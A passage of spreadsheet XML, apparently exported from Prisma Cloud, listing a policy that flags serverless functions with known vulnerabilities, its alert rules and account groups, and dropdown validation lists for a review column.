          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3535">
      <c r="A3535" t="inlineStr"/>
      <c r="B3535" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3535" s="2" t="inlineStr"/>
      <c r="D3535" t="n">
        <v>0</v>
      </c>
      <c r="E3535" t="n">
        <v>37</v>
      </c>
      <c r="F3535" t="n">
        <v>0</v>
      </c>
      <c r="G3535" t="b">
        <v>1</v>
      </c>
      <c r="H3535" t="inlineStr">
        <is>
          <t>BG-AH-Email-Test, BPtestTag, Default Alert Rule, JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance)., New Azure Subscription Created, PCS Demo  - Prisma Cloud XSOAR Filter, PCS Demo Compute Alert Test, Ranti-Jira-Alert-rule, anomalies-avega, ar-vstoyko, cj_test_tagBased, jbrox-AlertRule-MSTeams-Email, jbrox-runtime-Sec, mark davis test 412024, pagerduty-test, splunk-test, test-dws, testsrnimmagadda</t>
        </is>
      </c>
      <c r="I3535" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3535" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="K3535" t="inlineStr">
        <is>
          <t>Serverless Functions detected with known Vulnerabilities</t>
        </is>
      </c>
      <c r="L3535" t="inlineStr"/>
      <c r="M3535" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3535" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3535" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="P3535" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3535" t="inlineStr"/>
      <c r="R3535" t="inlineStr"/>
      <c r="S3535" t="inlineStr"/>
      <c r="T3535" t="b">
        <v>0</v>
      </c>
      <c r="U3535" t="inlineStr">
        <is>
          <t>vulnerabilities</t>
        </is>
      </c>
      <c r="V3535" t="inlineStr">
        <is>
          <t>workload_vulnerability</t>
        </is>
      </c>
      <c r="W3535" t="inlineStr">
        <is>
          <t>This policy identifies Serverless Functions detected with known vulnerabilities. Vulnerabilities could be exploited by attackers to compromise the confidentiality, integrity, or availability of the affected Serverless Function to perform malicious actions. It is highly recommended to remediate the vulnerabilities reported for the Serverless Function.</t>
        </is>
      </c>
      <c r="X3535" t="inlineStr">
        <is>
          <t>The following steps are recommended to remediate the vulnerability:
1) Understand the vulnerability and the significant risk it can pose
2) Apply the recommended patches, workarounds, or mitigations to remediate the vulnerability
3) Ascertain if any damage caused by the vulnerability</t>
        </is>
      </c>
      <c r="Y3535" t="inlineStr"/>
      <c r="Z3535" t="inlineStr"/>
      <c r="AA3535" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3535" t="inlineStr">
        <is>
          <t>2023-04-28 07:45:22</t>
        </is>
      </c>
      <c r="AC3535" t="inlineStr"/>
      <c r="AD3535" t="b">
        <v>1</v>
      </c>
      <c r="AE3535" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3535" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3535" t="inlineStr">
        <is>
          <t>BG-AH-Email-Test - Notifications:, AccountGroups:avega-active-directory,Default Account Group,Testing - 630918272677,jmontufar.org - 604739746859,Prod - 871720166196,mclayton-test,vwg,AWS Cloud willixmorax,Compute Only,Account Group - Cloud Discovery - Zw,cmustone-tenants,jbrox-empty-accGroup,Demo-for-compute,test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BPtestTag - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,Compute Only,vstoyko-test,jbrox_priv_acc,PCS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Default Alert Rule - Notifications:service_now, AccountGroups:Default Account Group,dmensah-shi-test;, JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance). - Notifications:, AccountGroups:Default Account Group,Compute Only,vstoyko-test,jbrox_priv_acc,PCS AWS Lab Org,PCS Azure Accounts,Developer-Demo-em,null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New Azure Subscription Created - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,Compute Only,vstoyko-test,demo0126,enwankwo-azure-flowlog,Marc's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 Prisma Cloud XSOAR Filter - Notifications:, AccountGroups:Default Account Group,Compute Only,vstoyko-test,jbrox_priv_acc,PCS AWS Lab Org,tushir-db-google,Test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PCS Demo Compute Alert Test - Notifications:microsoft_teams, AccountGroups:;, Ranti-Jira-Alert-rule - Notifications:jira, AccountGroups:Default Account Group,enwankwo-azure-acount-group,tussirpruthii,tadenugba_ACCOUNT_GROUP_NAME,enwankwo-azure-flowlog,SUGATHRI TUMIKI,PCS Azure Accounts,mbv-azure-appgw,mytestgroup,Ranti-Azure-terraform-group,Ranti-Account-Group,Stella_Azure,Azure-agentless-demo,kfirdaus-Azure-Acct;, anomalies-avega - Notifications:demisto, AccountGroups:Default Account Group,jmontufar.org - 604739746859,Compute Only,Demo-for-compute,test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- 430182375125,Mark Davis Acct Group,jmontufar-group1,jmontufar-group,PC-GCP-Onboarding-demo,Xpanse-prisma-test-utk,Xpanse-PrismaCloud-AccountGroup,testing-CAG,btimmer-test-accountgroup,compute-zw-rbac,test,hcl-runtime-alert-test,manish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ar-vstoyko - Notifications:service_now, AccountGroups:Default Account Group,vstoyko-test;, cj_test_tagBased - Notifications:, AccountGroups:Default Account Group;, jbrox-AlertRule-MSTeams-Email - Notifications:email,microsoft_teams, AccountGroups:jbrox_priv_acc;, jbrox-runtime-Sec - Notifications:, AccountGroups:;, mark davis test 412024 - Notifications:, AccountGroups:Default Account Group,jmontufar.org - 604739746859,mclayton-test,Compute Only,cmustone-tenants,jbrox-empty-accGroup,Demo-for-compute,test account group3,enwankwo-azure-acount-group,ranti-oci-test-group,tussirpruthii,RGM-Test,tadenugba_AG1,tadenugba_ACCOUNT_GROUP_NAME,CostSavings-Team,vstoyko-test,GCP-demo,test_acc_grp1,demo0126,enwankwo-azure-flowlog,Marc's Account Group,mdavis1 test acct group,jbrox_priv_acc,slivingston_test,sadfsadfsadf,PCS AWS Lab Org,okostine-test,null - 604739746859,test ac grp,test3,test pablo,coke,Pepsi,tushir-db-google,Test Account Group,test1_account_group_20231006,SUGATHRI TUMIKI,bpachauli-accesskey,PCS Azure Accounts,mbv-azure-appgw,mdavis1 AWS stand alone,Developer-Demo-em,null - 430182375125,afortes,Mark Davis Acct Group,jmontufar-group1,jmontufar-group,PC-GCP-Onboarding-demo,Xpanse-prisma-test-utk,Xpanse-PrismaCloud-AccountGroup,testing-CAG,PCS SWAT - Autoremediation Group,PCS SWAT Account Group - DO NOT TOUCH,btimmer-test-accountgroup,compute-zw-rbac,test,hcl-runtime-alert-test,manish account group,mytestgroup,Ranti-Azure-terraform-group,tushir-account-group,mboynton,Ranti-GCP-Grp,Ranti-Account-Group,PCS Lab OCI Accounts,TestAGMA,Kiran,Stella_Azure,Stella_All,Stella_AWS,Vaibhav_TEST,dluzardo AGlabs,TestMA,shyama-aws,tushir-db,Azure-agentless-demo,AWS-agentless-demo,GCP-agentless-demo,csansonabug-acount-group,NASDAQ PM,Example GCP Account Group,aws-lr-sandbox,CM-Devops-Test-Role-2,tushir-google,CM-Devops-Test-Role,RehanGCPOrg - 212193468572,test-edge,KiranTest,EmptySockShop,Bpachauli Account group,kmingo_test_accountgroup,PCSLABAG-MA,cfarquhar,tadenugba AG,PCS GCP Accounts,tp,Pramm_test,Wikenson account group,Chubb Account Group Test,jjc-demo-gp,tushir-java,DM_TEST_NEW,DM_TEST_2_Account_Group,kfirdaus-account-group,kfirdaus-GCP-acct-group,kfirdaus-Azure-Acct,kfirdaus AWS Account,cloudwatch_ag,K-Lo_AccountGroup,ACCOUNT_GROUP_NAME,CM test group,DM_TEST_account Demo,Gklimeck Account Group,llatorre - Account Group,dalomari-test,Shyama-test1,PCS AWS Accounts;, pagerduty-test - Notifications:, AccountGroups:Default Account Group,PCS AWS Lab Org,PCS Azure Accounts,PCS SWAT - Autoremediation Group,PCS SWAT Account Group - DO NOT TOUCH,PCS Lab OCI Accounts,PCS GCP Accounts,PCS AWS Accounts;, splunk-test - Notifications:splunk, AccountGroups:afortes;, test-dws - Notifications:, AccountGroups:;, testsrnimmagadda - Notifications:aws_s3, AccountGroups:;</t>
        </is>
      </c>
      <c r="AH3535" t="inlineStr">
        <is>
          <t>287de5f8-f5e6-4908-bdad-50c48e71a5da</t>
        </is>
      </c>
      <c r="AI3535" t="inlineStr"/>
      <c r="AJ3535" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3535" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
  </sheetData>
  <dataValidations count="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B1182 B1183 B1184 B1185 B1186 B1187 B1188 B1189 B1190 B1191 B1192 B1193 B1194 B1195 B1196 B1197 B1198 B1199 B1200 B1201 B1202 B1203 B1204 B1205 B1206 B1207 B1208 B1209 B1210 B1211 B1212 B1213 B1214 B1215 B1216 B1217 B1218 B1219 B1220 B1221 B1222 B1223 B1224 B1225 B1226 B1227 B1228 B1229 B1230 B1231 B1232 B1233 B1234 B1235 B1236 B1237 B1238 B1239 B1240 B1241 B1242 B1243 B1244 B1245 B1246 B1247 B1248 B1249 B1250 B1251 B1252 B1253 B1254 B1255 B1256 B1257 B1258 B1259 B1260 B1261 B1262 B1263 B1264 B1265 B1266 B1267 B1268 B1269 B1270 B1271 B1272 B1273 B1274 B1275 B1276 B1277 B1278 B1279 B1280 B1281 B1282 B1283 B1284 B1285 B1286 B1287 B1288 B1289 B1290 B1291 B1292 B1293 B1294 B1295 B1296 B1297 B1298 B1299 B1300 B1301 B1302 B1303 B1304 B1305 B1306 B1307 B1308 B1309 B1310 B1311 B1312 B1313 B1314 B1315 B1316 B1317 B1318 B1319 B1320 B1321 B1322 B1323 B1324 B1325 B1326 B1327 B1328 B1329 B1330 B1331 B1332 B1333 B1334 B1335 B1336 B1337 B1338 B1339 B1340 B1341 B1342 B1343 B1344 B1345 B1346 B1347 B1348 B1349 B1350 B1351 B1352 B1353 B1354 B1355 B1356 B1357 B1358 B1359 B1360 B1361 B1362 B1363 B1364 B1365 B1366 B1367 B1368 B1369 B1370 B1371 B1372 B1373 B1374 B1375 B1376 B1377 B1378 B1379 B1380 B1381 B1382 B1383 B1384 B1385 B1386 B1387 B1388 B1389 B1390 B1391 B1392 B1393 B1394 B1395 B1396 B1397 B1398 B1399 B1400 B1401 B1402 B1403 B1404 B1405 B1406 B1407 B1408 B1409 B1410 B1411 B1412 B1413 B1414 B1415 B1416 B1417 B1418 B1419 B1420 B1421 B1422 B1423 B1424 B1425 B1426 B1427 B1428 B1429 B1430 B1431 B1432 B1433 B1434 B1435 B1436 B1437 B1438 B1439 B1440 B1441 B1442 B1443 B1444 B1445 B1446 B1447 B1448 B1449 B1450 B1451 B1452 B1453 B1454 B1455 B1456 B1457 B1458 B1459 B1460 B1461 B1462 B1463 B1464 B1465 B1466 B1467 B1468 B1469 B1470 B1471 B1472 B1473 B1474 B1475 B1476 B1477 B1478 B1479 B1480 B1481 B1482 B1483 B1484 B1485 B1486 B1487 B1488 B1489 B1490 B1491 B1492 B1493 B1494 B1495 B1496 B1497 B1498 B1499 B1500 B1501 B1502 B1503 B1504 B1505 B1506 B1507 B1508 B1509 B1510 B1511 B1512 B1513 B1514 B1515 B1516 B1517 B1518 B1519 B1520 B1521 B1522 B1523 B1524 B1525 B1526 B1527 B1528 B1529 B1530 B1531 B1532 B1533 B1534 B1535 B1536 B1537 B1538 B1539 B1540 B1541 B1542 B1543 B1544 B1545 B1546 B1547 B1548 B1549 B1550 B1551 B1552 B1553 B1554 B1555 B1556 B1557 B1558 B1559 B1560 B1561 B1562 B1563 B1564 B1565 B1566 B1567 B1568 B1569 B1570 B1571 B1572 B1573 B1574 B1575 B1576 B1577 B1578 B1579 B1580 B1581 B1582 B1583 B1584 B1585 B1586 B1587 B1588 B1589 B1590 B1591 B1592 B1593 B1594 B1595 B1596 B1597 B1598 B1599 B1600 B1601 B1602 B1603 B1604 B1605 B1606 B1607 B1608 B1609 B1610 B1611 B1612 B1613 B1614 B1615 B1616 B1617 B1618 B1619 B1620 B1621 B1622 B1623 B1624 B1625 B1626 B1627 B1628 B1629 B1630 B1631 B1632 B1633 B1634 B1635 B1636 B1637 B1638 B1639 B1640 B1641 B1642 B1643 B1644 B1645 B1646 B1647 B1648 B1649 B1650 B1651 B1652 B1653 B1654 B1655 B1656 B1657 B1658 B1659 B1660 B1661 B1662 B1663 B1664 B1665 B1666 B1667 B1668 B1669 B1670 B1671 B1672 B1673 B1674 B1675 B1676 B1677 B1678 B1679 B1680 B1681 B1682 B1683 B1684 B1685 B1686 B1687 B1688 B1689 B1690 B1691 B1692 B1693 B1694 B1695 B1696 B1697 B1698 B1699 B1700 B1701 B1702 B1703 B1704 B1705 B1706 B1707 B1708 B1709 B1710 B1711 B1712 B1713 B1714 B1715 B1716 B1717 B1718 B1719 B1720 B1721 B1722 B1723 B1724 B1725 B1726 B1727 B1728 B1729 B1730 B1731 B1732 B1733 B1734 B1735 B1736 B1737 B1738 B1739 B1740 B1741 B1742 B1743 B1744 B1745 B1746 B1747 B1748 B1749 B1750 B1751 B1752 B1753 B1754 B1755 B1756 B1757 B1758 B1759 B1760 B1761 B1762 B1763 B1764 B1765 B1766 B1767 B1768 B1769 B1770 B1771 B1772 B1773 B1774 B1775 B1776 B1777 B1778 B1779 B1780 B1781 B1782 B1783 B1784 B1785 B1786 B1787 B1788 B1789 B1790 B1791 B1792 B1793 B1794 B1795 B1796 B1797 B1798 B1799 B1800 B1801 B1802 B1803 B1804 B1805 B1806 B1807 B1808 B1809 B1810 B1811 B1812 B1813 B1814 B1815 B1816 B1817 B1818 B1819 B1820 B1821 B1822 B1823 B1824 B1825 B1826 B1827 B1828 B1829 B1830 B1831 B1832 B1833 B1834 B1835 B1836 B1837 B1838 B1839 B1840 B1841 B1842 B1843 B1844 B1845 B1846 B1847 B1848 B1849 B1850 B1851 B1852 B1853 B1854 B1855 B1856 B1857 B1858 B1859 B1860 B1861 B1862 B1863 B1864 B1865 B1866 B1867 B1868 B1869 B1870 B1871 B1872 B1873 B1874 B1875 B1876 B1877 B1878 B1879 B1880 B1881 B1882 B1883 B1884 B1885 B1886 B1887 B1888 B1889 B1890 B1891 B1892 B1893 B1894 B1895 B1896 B1897 B1898 B1899 B1900 B1901 B1902 B1903 B1904 B1905 B1906 B1907 B1908 B1909 B1910 B1911 B1912 B1913 B1914 B1915 B1916 B1917 B1918 B1919 B1920 B1921 B1922 B1923 B1924 B1925 B1926 B1927 B1928 B1929 B1930 B1931 B1932 B1933 B1934 B1935 B1936 B1937 B1938 B1939 B1940 B1941 B1942 B1943 B1944 B1945 B1946 B1947 B1948 B1949 B1950 B1951 B1952 B1953 B1954 B1955 B1956 B1957 B1958 B1959 B1960 B1961 B1962 B1963 B1964 B1965 B1966 B1967 B1968 B1969 B1970 B1971 B1972 B1973 B1974 B1975 B1976 B1977 B1978 B1979 B1980 B1981 B1982 B1983 B1984 B1985 B1986 B1987 B1988 B1989 B1990 B1991 B1992 B1993 B1994 B1995 B1996 B1997 B1998 B1999 B2000 B2001 B2002 B2003 B2004 B2005 B2006 B2007 B2008 B2009 B2010 B2011 B2012 B2013 B2014 B2015 B2016 B2017 B2018 B2019 B2020 B2021 B2022 B2023 B2024 B2025 B2026 B2027 B2028 B2029 B2030 B2031 B2032 B2033 B2034 B2035 B2036 B2037 B2038 B2039 B2040 B2041 B2042 B2043 B2044 B2045 B2046 B2047 B2048 B2049 B2050 B2051 B2052 B2053 B2054 B2055 B2056 B2057 B2058 B2059 B2060 B2061 B2062 B2063 B2064 B2065 B2066 B2067 B2068 B2069 B2070 B2071 B2072 B2073 B2074 B2075 B2076 B2077 B2078 B2079 B2080 B2081 B2082 B2083 B2084 B2085 B2086 B2087 B2088 B2089 B2090 B2091 B2092 B2093 B2094 B2095 B2096 B2097 B2098 B2099 B2100 B2101 B2102 B2103 B2104 B2105 B2106 B2107 B2108 B2109 B2110 B2111 B2112 B2113 B2114 B2115 B2116 B2117 B2118 B2119 B2120 B2121 B2122 B2123 B2124 B2125 B2126 B2127 B2128 B2129 B2130 B2131 B2132 B2133 B2134 B2135 B2136 B2137 B2138 B2139 B2140 B2141 B2142 B2143 B2144 B2145 B2146 B2147 B2148 B2149 B2150 B2151 B2152 B2153 B2154 B2155 B2156 B2157 B2158 B2159 B2160 B2161 B2162 B2163 B2164 B2165 B2166 B2167 B2168 B2169 B2170 B2171 B2172 B2173 B2174 B2175 B2176 B2177 B2178 B2179 B2180 B2181 B2182 B2183 B2184 B2185 B2186 B2187 B2188 B2189 B2190 B2191 B2192 B2193 B2194 B2195 B2196 B2197 B2198 B2199 B2200 B2201 B2202 B2203 B2204 B2205 B2206 B2207 B2208 B2209 B2210 B2211 B2212 B2213 B2214 B2215 B2216 B2217 B2218 B2219 B2220 B2221 B2222 B2223 B2224 B2225 B2226 B2227 B2228 B2229 B2230 B2231 B2232 B2233 B2234 B2235 B2236 B2237 B2238 B2239 B2240 B2241 B2242 B2243 B2244 B2245 B2246 B2247 B2248 B2249 B2250 B2251 B2252 B2253 B2254 B2255 B2256 B2257 B2258 B2259 B2260 B2261 B2262 B2263 B2264 B2265 B2266 B2267 B2268 B2269 B2270 B2271 B2272 B2273 B2274 B2275 B2276 B2277 B2278 B2279 B2280 B2281 B2282 B2283 B2284 B2285 B2286 B2287 B2288 B2289 B2290 B2291 B2292 B2293 B2294 B2295 B2296 B2297 B2298 B2299 B2300 B2301 B2302 B2303 B2304 B2305 B2306 B2307 B2308 B2309 B2310 B2311 B2312 B2313 B2314 B2315 B2316 B2317 B2318 B2319 B2320 B2321 B2322 B2323 B2324 B2325 B2326 B2327 B2328 B2329 B2330 B2331 B2332 B2333 B2334 B2335 B2336 B2337 B2338 B2339 B2340 B2341 B2342 B2343 B2344 B2345 B2346 B2347 B2348 B2349 B2350 B2351 B2352 B2353 B2354 B2355 B2356 B2357 B2358 B2359 B2360 B2361 B2362 B2363 B2364 B2365 B2366 B2367 B2368 B2369 B2370 B2371 B2372 B2373 B2374 B2375 B2376 B2377 B2378 B2379 B2380 B2381 B2382 B2383 B2384 B2385 B2386 B2387 B2388 B2389 B2390 B2391 B2392 B2393 B2394 B2395 B2396 B2397 B2398 B2399 B2400 B2401 B2402 B2403 B2404 B2405 B2406 B2407 B2408 B2409 B2410 B2411 B2412 B2413 B2414 B2415 B2416 B2417 B2418 B2419 B2420 B2421 B2422 B2423 B2424 B2425 B2426 B2427 B2428 B2429 B2430 B2431 B2432 B2433 B2434 B2435 B2436 B2437 B2438 B2439 B2440 B2441 B2442 B2443 B2444 B2445 B2446 B2447 B2448 B2449 B2450 B2451 B2452 B2453 B2454 B2455 B2456 B2457 B2458 B2459 B2460 B2461 B2462 B2463 B2464 B2465 B2466 B2467 B2468 B2469 B2470 B2471 B2472 B2473 B2474 B2475 B2476 B2477 B2478 B2479 B2480 B2481 B2482 B2483 B2484 B2485 B2486 B2487 B2488 B2489 B2490 B2491 B2492 B2493 B2494 B2495 B2496 B2497 B2498 B2499 B2500 B2501 B2502 B2503 B2504 B2505 B2506 B2507 B2508 B2509 B2510 B2511 B2512 B2513 B2514 B2515 B2516 B2517 B2518 B2519 B2520 B2521 B2522 B2523 B2524 B2525 B2526 B2527 B2528 B2529 B2530 B2531 B2532 B2533 B2534 B2535 B2536 B2537 B2538 B2539 B2540 B2541 B2542 B2543 B2544 B2545 B2546 B2547 B2548 B2549 B2550 B2551 B2552 B2553 B2554 B2555 B2556 B2557 B2558 B2559 B2560 B2561 B2562 B2563 B2564 B2565 B2566 B2567 B2568 B2569 B2570 B2571 B2572 B2573 B2574 B2575 B2576 B2577 B2578 B2579 B2580 B2581 B2582 B2583 B2584 B2585 B2586 B2587 B2588 B2589 B2590 B2591 B2592 B2593 B2594 B2595 B2596 B2597 B2598 B2599 B2600 B2601 B2602 B2603 B2604 B2605 B2606 B2607 B2608 B2609 B2610 B2611 B2612 B2613 B2614 B2615 B2616 B2617 B2618 B2619 B2620 B2621 B2622 B2623 B2624 B2625 B2626 B2627 B2628 B2629 B2630 B2631 B2632 B2633 B2634 B2635 B2636 B2637 B2638 B2639 B2640 B2641 B2642 B2643 B2644 B2645 B2646 B2647 B2648 B2649 B2650 B2651 B2652 B2653 B2654 B2655 B2656 B2657 B2658 B2659 B2660 B2661 B2662 B2663 B2664 B2665 B2666 B2667 B2668 B2669 B2670 B2671 B2672 B2673 B2674 B2675 B2676 B2677 B2678 B2679 B2680 B2681 B2682 B2683 B2684 B2685 B2686 B2687 B2688 B2689 B2690 B2691 B2692 B2693 B2694 B2695 B2696 B2697 B2698 B2699 B2700 B2701 B2702 B2703 B2704 B2705 B2706 B2707 B2708 B2709 B2710 B2711 B2712 B2713 B2714 B2715 B2716 B2717 B2718 B2719 B2720 B2721 B2722 B2723 B2724 B2725 B2726 B2727 B2728 B2729 B2730 B2731 B2732 B2733 B2734 B2735 B2736 B2737 B2738 B2739 B2740 B2741 B2742 B2743 B2744 B2745 B2746 B2747 B2748 B2749 B2750 B2751 B2752 B2753 B2754 B2755 B2756 B2757 B2758 B2759 B2760 B2761 B2762 B2763 B2764 B2765 B2766 B2767 B2768 B2769 B2770 B2771 B2772 B2773 B2774 B2775 B2776 B2777 B2778 B2779 B2780 B2781 B2782 B2783 B2784 B2785 B2786 B2787 B2788 B2789 B2790 B2791 B2792 B2793 B2794 B2795 B2796 B2797 B2798 B2799 B2800 B2801 B2802 B2803 B2804 B2805 B2806 B2807 B2808 B2809 B2810 B2811 B2812 B2813 B2814 B2815 B2816 B2817 B2818 B2819 B2820 B2821 B2822 B2823 B2824 B2825 B2826 B2827 B2828 B2829 B2830 B2831 B2832 B2833 B2834 B2835 B2836 B2837 B2838 B2839 B2840 B2841 B2842 B2843 B2844 B2845 B2846 B2847 B2848 B2849 B2850 B2851 B2852 B2853 B2854 B2855 B2856 B2857 B2858 B2859 B2860 B2861 B2862 B2863 B2864 B2865 B2866 B2867 B2868 B2869 B2870 B2871 B2872 B2873 B2874 B2875 B2876 B2877 B2878 B2879 B2880 B2881 B2882 B2883 B2884 B2885 B2886 B2887 B2888 B2889 B2890 B2891 B2892 B2893 B2894 B2895 B2896 B2897 B2898 B2899 B2900 B2901 B2902 B2903 B2904 B2905 B2906 B2907 B2908 B2909 B2910 B2911 B2912 B2913 B2914 B2915 B2916 B2917 B2918 B2919 B2920 B2921 B2922 B2923 B2924 B2925 B2926 B2927 B2928 B2929 B2930 B2931 B2932 B2933 B2934 B2935 B2936 B2937 B2938 B2939 B2940 B2941 B2942 B2943 B2944 B2945 B2946 B2947 B2948 B2949 B2950 B2951 B2952 B2953 B2954 B2955 B2956 B2957 B2958 B2959 B2960 B2961 B2962 B2963 B2964 B2965 B2966 B2967 B2968 B2969 B2970 B2971 B2972 B2973 B2974 B2975 B2976 B2977 B2978 B2979 B2980 B2981 B2982 B2983 B2984 B2985 B2986 B2987 B2988 B2989 B2990 B2991 B2992 B2993 B2994 B2995 B2996 B2997 B2998 B2999 B3000 B3001 B3002 B3003 B3004 B3005 B3006 B3007 B3008 B3009 B3010 B3011 B3012 B3013 B3014 B3015 B3016 B3017 B3018 B3019 B3020 B3021 B3022 B3023 B3024 B3025 B3026 B3027 B3028 B3029 B3030 B3031 B3032 B3033 B3034 B3035 B3036 B3037 B3038 B3039 B3040 B3041 B3042 B3043 B3044 B3045 B3046 B3047 B3048 B3049 B3050 B3051 B3052 B3053 B3054 B3055 B3056 B3057 B3058 B3059 B3060 B3061 B3062 B3063 B3064 B3065 B3066 B3067 B3068 B3069 B3070 B3071 B3072 B3073 B3074 B3075 B3076 B3077 B3078 B3079 B3080 B3081 B3082 B3083 B3084 B3085 B3086 B3087 B3088 B3089 B3090 B3091 B3092 B3093 B3094 B3095 B3096 B3097 B3098 B3099 B3100 B3101 B3102 B3103 B3104 B3105 B3106 B3107 B3108 B3109 B3110 B3111 B3112 B3113 B3114 B3115 B3116 B3117 B3118 B3119 B3120 B3121 B3122 B3123 B3124 B3125 B3126 B3127 B3128 B3129 B3130 B3131 B3132 B3133 B3134 B3135 B3136 B3137 B3138 B3139 B3140 B3141 B3142 B3143 B3144 B3145 B3146 B3147 B3148 B3149 B3150 B3151 B3152 B3153 B3154 B3155 B3156 B3157 B3158 B3159 B3160 B3161 B3162 B3163 B3164 B3165 B3166 B3167 B3168 B3169 B3170 B3171 B3172 B3173 B3174 B3175 B3176 B3177 B3178 B3179 B3180 B3181 B3182 B3183 B3184 B3185 B3186 B3187 B3188 B3189 B3190 B3191 B3192 B3193 B3194 B3195 B3196 B3197 B3198 B3199 B3200 B3201 B3202 B3203 B3204 B3205 B3206 B3207 B3208 B3209 B3210 B3211 B3212 B3213 B3214 B3215 B3216 B3217 B3218 B3219 B3220 B3221 B3222 B3223 B3224 B3225 B3226 B3227 B3228 B3229 B3230 B3231 B3232 B3233 B3234 B3235 B3236 B3237 B3238 B3239 B3240 B3241 B3242 B3243 B3244 B3245 B3246 B3247 B3248 B3249 B3250 B3251 B3252 B3253 B3254 B3255 B3256 B3257 B3258 B3259 B3260 B3261 B3262 B3263 B3264 B3265 B3266 B3267 B3268 B3269 B3270 B3271 B3272 B3273 B3274 B3275 B3276 B3277 B3278 B3279 B3280 B3281 B3282 B3283 B3284 B3285 B3286 B3287 B3288 B3289 B3290 B3291 B3292 B3293 B3294 B3295 B3296 B3297 B3298 B3299 B3300 B3301 B3302 B3303 B3304 B3305 B3306 B3307 B3308 B3309 B3310 B3311 B3312 B3313 B3314 B3315 B3316 B3317 B3318 B3319 B3320 B3321 B3322 B3323 B3324 B3325 B3326 B3327 B3328 B3329 B3330 B3331 B3332 B3333 B3334 B3335 B3336 B3337 B3338 B3339 B3340 B3341 B3342 B3343 B3344 B3345 B3346 B3347 B3348 B3349 B3350 B3351 B3352 B3353 B3354 B3355 B3356 B3357 B3358 B3359 B3360 B3361 B3362 B3363 B3364 B3365 B3366 B3367 B3368 B3369 B3370 B3371 B3372 B3373 B3374 B3375 B3376 B3377 B3378 B3379 B3380 B3381 B3382 B3383 B3384 B3385 B3386 B3387 B3388 B3389 B3390 B3391 B3392 B3393 B3394 B3395 B3396 B3397 B3398 B3399 B3400 B3401 B3402 B3403 B3404 B3405 B3406 B3407 B3408 B3409 B3410 B3411 B3412 B3413 B3414 B3415 B3416 B3417 B3418 B3419 B3420 B3421 B3422 B3423 B3424 B3425 B3426 B3427 B3428 B3429 B3430 B3431 B3432 B3433 B3434 B3435 B3436 B3437 B3438 B3439 B3440 B3441 B3442 B3443 B3444 B3445 B3446 B3447 B3448 B3449 B3450 B3451 B3452 B3453 B3454 B3455 B3456 B3457 B3458 B3459 B3460 B3461 B3462 B3463 B3464 B3465 B3466 B3467 B3468 B3469 B3470 B3471 B3472 B3473 B3474 B3475 B3476 B3477 B3478 B3479 B3480 B3481 B3482 B3483 B3484 B3485 B3486 B3487 B3488 B3489 B3490 B3491 B3492 B3493 B3494 B3495 B3496 B3497 B3498 B3499 B3500 B3501 B3502 B3503 B3504 B3505 B3506 B3507 B3508 B3509 B3510 B3511 B3512 B3513 B3514 B3515 B3516 B3517 B3518 B3519 B3520 B3521 B3522 B3523 B3524 B3525 B3526 B3527 B3528 B3529 B3530 B3531 B3532 B3533 B3534 B3535" showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="0" errorTitle="Invalid Entry" error="Invalid value entered. Please select a value from the dropdown list." type="list">
      <formula1>"YES,NO,REVIEW,MAYBE,REMOVE"</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showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="0" errorTitle="Invalid Entry" error="Invalid value entered. Please select a value from the dropdown list." type="list">
      <formula1>"Inventory,Logging,Secure access management,Secure network configuration,Data protection,API protection,Protective services,Secure development,Detection services,Response actions,Forensics,Resilience"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2024-11-19T15:01:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-19T15:03:26Z</dcterms:modified>
</cp:coreProperties>
</file>